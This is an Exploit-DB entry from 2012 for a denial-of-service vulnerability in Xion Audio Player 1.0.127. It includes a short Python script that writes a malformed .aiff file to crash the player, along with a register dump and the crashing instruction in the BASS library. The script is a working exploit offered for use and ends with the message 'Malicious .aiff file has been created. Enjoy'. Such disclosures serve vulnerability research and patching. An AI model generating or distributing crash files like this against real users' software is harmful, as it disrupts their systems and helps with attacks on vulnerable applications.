Xion Audio Player 1.0.127 - '.aiff' Denial of Service

EDB-ID:

18698

CVE:


EDB Verified:

Author:

condis

Type:

dos

Exploit:   /  

Platform:

Windows

Date:

2012-04-04

Vulnerable App: 
#!/usr/bin/python

# -------------------------------------------------------------------
# Xion Audio Player 1.0.127 (.aiff) Denial of Service Vulnerability
# found by condis
#
# Download  : http://xion.r2.com.au/index.php?page=download
# Tested on : Windows XP SP3 Professional PL
#
# Registers : 
#
# EAX 00000000
# ECX 02D0B488
# EDX 7C90E4F4 ntdll.KiFastSystemCallRet
# EBX 02D0B4F8
# ESP 02D0B4F8
# EBP 02D0CA60
# ESI 003D8D80
# EDI 00001A00
# EIP 11013C18 BASS.11013C18
#
# 11013C18   C740 20 01000000 MOV DWORD PTR DS:[EAX+20],1 <--- crash
#
# "Access Violation while writing to 00000020"
#
# I've also found this kind of bug while playing around with .flac 
# files so I think that handling all of the supported formats must be 
# really messed up :<
# --------------------------------------------------------------------

evil  = "FORM\x00\x00\x37\xA4AIFFCOMM"
evil += "A" # <--- crash (rest of the file doesn't matters)

aiff = open('xion-crash.aiff', 'w')
aiff.write(evil)
aiff.close()

print "Malicious .aiff file has been created. Enjoy"
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services